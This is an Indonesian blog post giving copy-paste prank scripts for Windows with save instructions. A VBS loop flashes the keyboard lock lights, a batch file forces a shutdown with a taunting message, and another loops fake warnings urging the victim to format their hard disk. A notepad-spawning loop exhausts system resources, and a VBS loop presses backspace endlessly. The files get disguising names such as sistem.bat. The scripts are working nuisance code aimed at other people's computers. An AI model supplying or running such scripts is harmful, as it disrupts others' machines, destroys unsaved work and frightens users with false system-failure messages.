Artikel Teknologi Informasi dan Ilmu Komputer




script bandel

Lampu keyboard berkedip terus menerus

Pertama2 Buka notepad,
Caranya : Start –> All Programs –> Accessories –> Notepad, atau masuk di RUN lalu ketik notepad dan Enter, trus copy kode script visual basic di bawah ini, lalu paste di notepad.


Set wshShell=wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
Kemudian save dengan nama apa aja terserah kamu, asalkan ber-ekstension .vbs
contoh : iseng.vbs,
jangan lupa save as type nya kamu pilih yang all files.

Shutdown tiba-tiba

Pertama2 Buka notepad,
Caranya : Start –> All Programs –> Accessories –> Notepad,
atau masuk di RUN lalu ketik notepad dan Enter,
Copas kode di bawah ini …
@echo off
msg * Nah lohhh ???!
shutdown -s -c “Error! mampus laptop lo mati , bye”
Kemudian save dengan nama apa aja terserah kamu, asalkan ber-ekstension .bat
contoh : sistem.bat, jangan lupa save as type nya kamu pilih yang all files.

Message yang nongol melulu

Pertama2 Buka notepad,
Caranya : Start –> All Programs –> Accessories –> Notepad,
atau masuk di RUN lalu ketik notepad dan Enter,
Copas kode di bawah ini …
@ECHO off
:Begin
msg * PLease format your hardisk now
msg * your sistem has been eror
msg * I was detect your sistem, i want to kill your sistem operastion (http://radjsblog.co.cc)
msg * Dont miss it !! rebot and then format your hardisk now !!
msg * LOL !! 1 2 3 ..
GOTO BEGIN
Kemudian save dengan nama apa aja terserah kamu, asalkan ber-ekstension .bat
contoh : sistem.bat, jangan lupa save as type nya kamu pilih yang all files.

Buka notepad trus menerus

Pertama2 Buka notepad,
Caranya : Start –> All Programs –> Accessories –> Notepad,
atau masuk di RUN lalu ketik notepad dan Enter,
Copas kode di bawah ini ..
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Kemudian save dengan nama apa aja terserah kamu, asalkan ber-ekstension .bat
contoh : sistem.bat, jangan lupa save as type nya kamu pilih yang all files.

Tombol backspace melulu

Pertama2 Buka notepad,
Caranya : Start –> All Programs –> Accessories –> Notepad,
atau masuk di RUN lalu ketik notepad dan Enter,
Copas kode di bawah ini …
MsgBox “Enter Please”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Kemudian save dengan nama apa aja terserah kamu, asalkan ber-ekstension .vbs
contoh : sistem.vbs, jangan lupa save as type nya kamu pilih yang all files.

Labels:



comment closed

Copyright © RAMSI-SMBIRINK.